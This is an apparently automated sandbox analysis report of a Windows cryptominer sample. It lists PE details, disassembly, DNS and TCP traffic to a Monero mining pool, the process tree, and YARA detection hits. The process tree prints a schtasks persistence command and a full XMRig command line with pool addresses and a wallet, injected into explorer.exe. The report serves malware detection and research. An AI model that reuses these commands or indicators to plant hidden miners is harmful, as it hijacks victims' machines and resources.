                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:02549ff92b49cce693542fc9afb10102

                                                        Entrypoint Preview

                                                        Instruction
                                                        push ebp
                                                        dec eax
                                                        mov ebp, esp
                                                        dec eax
                                                        sub esp, 00000040h
                                                        dec eax
                                                        mov eax, 00000004h
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        dec ecx
                                                        mov eax, eax
                                                        mov eax, 00000000h
                                                        dec ecx
                                                        mov ebx, eax
                                                        dec eax
                                                        lea eax, dword ptr [ebp-04h]
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        dec esp
                                                        mov edx, ebx
                                                        call 00007FED04FB3421h
                                                        dec eax
                                                        lea eax, dword ptr [FFFFFF98h]
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        call 00007FED04FB343Fh
                                                        mov eax, 00000001h
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        call 00007FED04FB3437h
                                                        mov eax, 00030000h
                                                        dec ecx
                                                        mov ebx, eax
                                                        mov eax, 00010000h
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        dec esp
                                                        mov edx, ebx
                                                        call 00007FED04FB3424h
                                                        dec eax
                                                        mov eax, dword ptr [00220624h]
                                                        dec eax
                                                        mov ecx, dword ptr [00220625h]
                                                        dec eax
                                                        mov edx, dword ptr [00220626h]
                                                        dec eax
                                                        mov dword ptr [ebp-10h], eax
                                                        dec eax
                                                        lea eax, dword ptr [ebp-04h]
                                                        dec eax
                                                        mov dword ptr [esp+20h], eax
                                                        mov eax, dword ptr [00221C17h]
                                                        dec ecx
                                                        mov ecx, eax
                                                        dec ecx
                                                        mov eax, edx
                                                        dec ecx
                                                        mov ebx, ecx
                                                        dec eax
                                                        mov eax, dword ptr [ebp-10h]
                                                        dec ecx
                                                        mov edx, eax
                                                        dec esp
                                                        mov ecx, edx
                                                        dec esp
                                                        mov edx, ebx
                                                        call 00007FED04FB33E9h
                                                        dec eax
                                                        mov eax, dword ptr [002205E1h]
                                                        dec eax
                                                        mov ecx, dword ptr [002205E2h]
                                                        dec eax
                                                        mov edx, dword ptr [002205E3h]

                                                        Data Directories

                                                         Name | Virtual Address | Virtual Size | Is in Section
                                                         IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                         IMAGE_DIRECTORY_ENTRY_IMPORT | 0x222930 | 0x3c | .rdata
                                                         IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                                         IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x224000 | 0x90 | .pdata
                                                         IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                         IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                         IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                         IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                         IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                         IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                         IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                         IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                         IMAGE_DIRECTORY_ENTRY_IAT | 0x22296c | 0x90 | .rdata
                                                         IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                         IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                         IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                        Sections

                                                         Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                         .text | 0x1000 | 0x14e0 | 0x1600 | False | 0.327414772727 | data | 5.39828227973 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                         .rdata | 0x3000 | 0x21fb6e | 0x21fc00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                         .bss | 0x223000 | 0xfac | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                         .pdata | 0x224000 | 0x90 | 0x200 | False | 0.17578125 | data | 1.20871562712 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Imports

                                                         DLL | Import
                                                         msvcrt.dll | malloc, memset, _get_pgmptr, getenv, sprintf, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                                         kernel32.dll | Sleep, CreateProcessA, SetUnhandledExceptionFilter

                                                        Network Behavior

                                                        Network Port Distribution

                                                        TCP Packets

                                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                         Nov 1, 2021 18:20:34.654522896 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:20:34.802129984 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:20:34.802308083 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:20:34.802676916 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:20:34.949754000 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:20:34.952109098 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:20:35.006928921 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:20:58.889048100 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:20:59.037017107 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:20:59.165097952 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:21:03.528681040 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:21:03.676541090 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:21:03.852927923 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:21:09.292006969 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:21:09.353405952 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:21:21.406594992 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:21:21.554615974 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:21:21.667011976 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:21:22.168793917 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:21:22.354504108 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:21:31.754548073 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:21:31.902127981 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:21:31.964907885 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:21:53.601584911 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:21:53.749329090 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:21:53.857152939 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:08.663139105 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:08.811105013 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:22:08.858422995 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:14.833985090 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:14.982608080 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:22:15.171436071 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:37.397836924 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:22:37.470323086 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:39.301384926 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:22:39.360992908 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:40.564130068 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:40.712826967 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:22:40.861068964 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:43.200921059 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:43.348690987 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:22:43.470679045 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:52.311743021 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:52.459568024 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:22:52.674566984 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:55.326248884 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:22:55.474033117 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:22:55.674835920 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:00.538438082 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:00.686855078 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:23:00.862798929 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:06.417404890 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:06.566159010 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:23:06.675754070 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:14.762794018 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:14.910789013 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:23:14.973330975 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:16.868604898 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:17.016742945 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:23:17.176672935 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:22.813848972 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:22.961983919 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:23:23.177175999 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:24.301785946 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:23:24.380407095 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:27.197225094 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:27.345983982 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:23:27.568159103 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:23:43.398880005 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:23:43.484649897 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:24:02.688910007 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:24:02.836719036 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:24:02.977413893 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:24:05.420484066 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117
                                                         Nov 1, 2021 18:24:05.568367004 CET | 8080 | 49763 | 198.23.214.117 | 192.168.2.4
                                                         Nov 1, 2021 18:24:05.680722952 CET | 49763 | 8080 | 192.168.2.4 | 198.23.214.117

                                                        UDP Packets

                                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                         Nov 1, 2021 18:20:34.627938986 CET | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                                                         Nov 1, 2021 18:20:34.650455952 CET | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                                                         Nov 1, 2021 18:22:29.095741987 CET | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                                                         Nov 1, 2021 18:22:29.119029999 CET | 53 | 55854 | 8.8.8.8 | 192.168.2.4

                                                        DNS Queries

                                                         Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                         Nov 1, 2021 18:20:34.627938986 CET | 192.168.2.4 | 8.8.8.8 | 0xd8f8 | Standard query (0) | xmr.givemexyz.in | A (IP address) | IN (0x0001)
                                                         Nov 1, 2021 18:22:29.095741987 CET | 192.168.2.4 | 8.8.8.8 | 0xe55c | Standard query (0) | xmr.givemexyz.in | A (IP address) | IN (0x0001)

                                                        DNS Answers

                                                         Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                         Nov 1, 2021 18:20:34.650455952 CET | 8.8.8.8 | 192.168.2.4 | 0xd8f8 | No error (0) | xmr.givemexyz.in | | 212.114.52.24 | A (IP address) | IN (0x0001)
                                                         Nov 1, 2021 18:20:34.650455952 CET | 8.8.8.8 | 192.168.2.4 | 0xd8f8 | No error (0) | xmr.givemexyz.in | | 198.23.214.117 | A (IP address) | IN (0x0001)
                                                         Nov 1, 2021 18:20:34.650455952 CET | 8.8.8.8 | 192.168.2.4 | 0xd8f8 | No error (0) | xmr.givemexyz.in | | 194.5.249.24 | A (IP address) | IN (0x0001)
                                                         Nov 1, 2021 18:22:29.119029999 CET | 8.8.8.8 | 192.168.2.4 | 0xe55c | No error (0) | xmr.givemexyz.in | | 198.23.214.117 | A (IP address) | IN (0x0001)
                                                         Nov 1, 2021 18:22:29.119029999 CET | 8.8.8.8 | 192.168.2.4 | 0xe55c | No error (0) | xmr.givemexyz.in | | 212.114.52.24 | A (IP address) | IN (0x0001)
                                                         Nov 1, 2021 18:22:29.119029999 CET | 8.8.8.8 | 192.168.2.4 | 0xe55c | No error (0) | xmr.givemexyz.in | | 194.5.249.24 | A (IP address) | IN (0x0001)

                                                        Code Manipulations

                                                        Statistics

                                                        Behavior

                                                        System Behavior

                                                        General

                                                        Start time:18:20:03
                                                        Start date:01/11/2021
                                                        Path:C:\Users\user\Desktop\pcNCraWcRk.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Users\user\Desktop\pcNCraWcRk.exe'
                                                        Imagebase:0x400000
                                                        File size:2234368 bytes
                                                        MD5 hash:0958FA69BA0E6645C42215C5325D8F76
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        General

                                                        Start time:18:20:03
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:18:20:06
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff622070000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:18:20:07
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:18:20:08
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\schtasks.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff6de4a0000
                                                        File size:226816 bytes
                                                        MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:18:20:09
                                                        Start date:01/11/2021
                                                        Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Imagebase:0x400000
                                                        File size:2234368 bytes
                                                        MD5 hash:0958FA69BA0E6645C42215C5325D8F76
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 65%, Virustotal
                                                        • Detection: 31%, Metadefender
                                                        • Detection: 81%, ReversingLabs
                                                        Reputation:low

                                                        General

                                                        Start time:18:20:10
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.847002769.000002C950221000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.849031612.000002C960EA6000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.849070126.000002C960F01000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.709450089.000002C968F90000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.717098920.000002C968F90000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000003.708284013.000002C968F90000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000009.00000002.847850368.000002C9604A6000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        General

                                                        Start time:18:20:11
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff622070000
                                                        File size:273920 bytes
                                                        MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:18:20:11
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        General

                                                        Start time:18:20:12
                                                        Start date:01/11/2021
                                                        Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                        Imagebase:0x400000
                                                        File size:2234368 bytes
                                                        MD5 hash:0958FA69BA0E6645C42215C5325D8F76
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low

                                                        General

                                                        Start time:18:20:13
                                                        Start date:01/11/2021
                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
                                                        Imagebase:0x400000
                                                        File size:31232 bytes
                                                        MD5 hash:2497F634A80476AE2EAE956D8B84528E
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 49%, Metadefender
                                                        • Detection: 82%, ReversingLabs
                                                        Reputation:low

                                                        General

                                                        Start time:18:20:13
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Yara matches:
                                                        • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.952663246.000002A7930D9000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.732288392.000002A7830D1000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000003.719582086.000002A79BBD0000.00000004.00000001.sdmp, Author: Joe Security
                                                        Reputation:high

                                                        General

                                                        Start time:18:20:13
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:'C:\Windows\System32\conhost.exe' '/sihost64'
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:high

                                                        General

                                                        Start time:18:20:18
                                                        Start date:01/11/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
                                                        Imagebase:0x7ff6fee60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.728856594.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.723918666.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.726457226.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.712169070.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.727304311.0000000140000000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000000.719362766.0000000140753000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
                                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000011.00000000.724751295.0000000140000000.00000040.00000001.sdmp, Author: Florian Roth
